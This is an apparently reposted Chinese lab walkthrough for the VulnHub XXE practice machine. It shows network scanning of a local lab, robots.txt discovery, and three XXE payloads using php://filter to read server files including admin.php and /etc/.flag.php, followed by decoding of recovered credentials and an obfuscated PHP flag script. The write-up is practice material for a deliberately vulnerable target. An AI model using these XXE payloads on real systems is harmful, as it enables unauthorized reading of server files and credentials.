靶场复现 | vulhub-XXE | CN-SEC 中文网

admin

138985
文章

114
评论

2024年2月18日23:08:14评论17 views字数 2738阅读9分7秒阅读模式

01 靶机安装

靶机下载地址：

https: //download.vulnhub.com/xxe/XXE.zip

如上地址直接拿到浏览器上，就可以进行靶机下载，下载后的文件夹如下所示：

直接打开虚拟机：

最后使用虚拟机打开（打开的文件在新建虚拟机路径下面）

02 信息收集

已知环境：

kali的IP：192.168.168.128（作为攻击机）XXE靶机未知

1.探测局域网主机

方法一：探测全部，排除选择

arp-scan -l

我们选192.168.168.129

方法二：使用nmap工具，对比MAC地址

nmap 192.168.168.100-199（探测192.168.93.100到192.168.93.199之中的所有主机）

‍

nmap -sA 192.168.168.0/24（探测0-24网段端口和服务）

对比mac地址成功！

结果：XXE靶机：192.168.168.129

由上图可以看出，XXE开放了80号端口，http协议端口开放，说明有web站点，访问192.168.168.129，结果如下所示：

2. 信息收集

对于一个已知道的站点，第一步肯定是扫描，机器有御剑，AWVS，还可以使用burpsuit爬取网页结构等等，这里直接说信息收集的结果：

发现robots.txt文件，地址

http://192.168.168.129/robots.txt

具体结果如下：

03 解题

由上一步的信息收集我们可以知道，该网站有如下两个目录：

http://192.168.168.129/xxe/admin.phphttp://192.168.168.129/xxe/

先进入http://192.168.168.129/xxe/；尝试登录并抓包：

POC如下所示：

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=admin.php">]><root><name>&admin;</name><password>admin</password></root>

进入重放模块，使用POC进行分析：

进行base64解码；

继续MD5解码：

解码结果分析可得用户名和密码：

administhebest / admin@123

进行登录

http://192.168.168.129/xxe/admin.php

发现Flag.php，点击查看
发现新文件flagmeout.php

在burp中读取文件：

读取flagmeout.php文件的POC如下所示：

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=./flagmeout.php">]><root><name>&admin;</name><password>admin</password></root>

base64解码结果如下所示：

<?php$flag = "";echo $flag;?>JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5

对JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5进行base32解码后再进行base64解码后的结果为

/etc/.flag.php

然后读取/etc/.flag.php中的内容，POC如下所示：

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/.flag.php">]><root><name>&admin;</name><password>admin</password></root>

其中内容解码结果如下所示，直接PHP运行得到结果：

$_[]++;$_[]=$_._;$_____=$_[(++$__[])][(++$__[])+(++$__[])+(++$__[])];$_=$_[$_[+_]];$___=$__=$_[++$__[]];$____=$_=$_[+_];$_++;$_++;$_++;$_=$____.++$___.$___.++$_.$__.++$___;$__=$_;$_=$_____;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$___=+_;$___.=$__;$___=++$_^$___[+_];$Ã€=+_;$Ã=$Ã‚=$Ãƒ=$Ã„=$Ã†=$Ãˆ=$Ã‰=$ÃŠ=$Ã‹=++$Ã[];$Ã‚++;$Ãƒ++;$Ãƒ++;$Ã„++;$Ã„++;$Ã„++;$Ã†++;$Ã†++;$Ã†++;$Ã†++;$Ãˆ++;$Ãˆ++;$Ãˆ++;$Ãˆ++;$Ãˆ++;$Ã‰++;$Ã‰++;$Ã‰++;$Ã‰++;$Ã‰++;$Ã‰++;$ÃŠ++;$ÃŠ++;$ÃŠ++;$ÃŠ++;$ÃŠ++;$ÃŠ++;$ÃŠ++;$Ã‹++;$Ã‹++;$Ã‹++;$Ã‹++;$Ã‹++;$Ã‹++;$Ã‹++;$__('$_="'.$___.$Ã.$Ã‚.$Ãƒ.$___.$Ã.$Ã€.$Ã.$___.$Ã.$Ã€.$Ãˆ.$___.$Ã.$Ã€.$Ãƒ.$___.$Ã.$Ã‚.$Ãƒ.$___.$Ã.$Ã‚.$Ã€.$___.$Ã.$Ã‰.$Ãƒ.$___.$Ã.$Ã‰.$Ã€.$___.$Ã.$Ã‰.$Ã€.$___.$Ã.$Ã„.$Ã†.$___.$Ã.$Ãƒ.$Ã‰.$___.$Ã.$Ã†.$Ã.$___.$Ã.$Ãˆ.$Ãƒ.$___.$Ã.$Ãƒ.$Ã‰.$___.$Ã.$Ãˆ.$Ãƒ.$___.$Ã.$Ã†.$Ã‰.$___.$Ã.$Ãƒ.$Ã‰.$___.$Ã.$Ã„.$Ã†.$___.$Ã.$Ã„.$Ã.$___.$Ã.$Ãˆ.$Ãƒ.$___.$Ã.$Ã‰.$Ã.$___.$Ã.$Ã‰.$Ã†.'"');$__($_);

创建1.php

记得添加结构：

<?php ?>

本地访问：出现空白或者报错页面。

成功！！！

原文始发于微信公众号（小木说安全）：靶场复现 | vulhub-XXE

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

靶场复现 | vulhub-XXE

已知环境：

1.探测局域网主机

2. 信息收集

HTB-CozyHosting 红队靶机三阶渗透思维突破：Cookie伪造+命令注入组合拳

【vulhub】 GoldenEye

MCP带来的新型安全威胁

一次有趣的前端加密对抗分享

记一次对湾湾站点的getshell到网

一个被遗忘的 API 端点让我赚了 $500

使用burpsuite爆破带有验证码和随机uuid的密码的一次经验

RAG 受到攻击：LLM 漏洞如何影响真实系统

某次211大学的渗透测试过程

源码泄露发现

发表评论

在线咨询

微信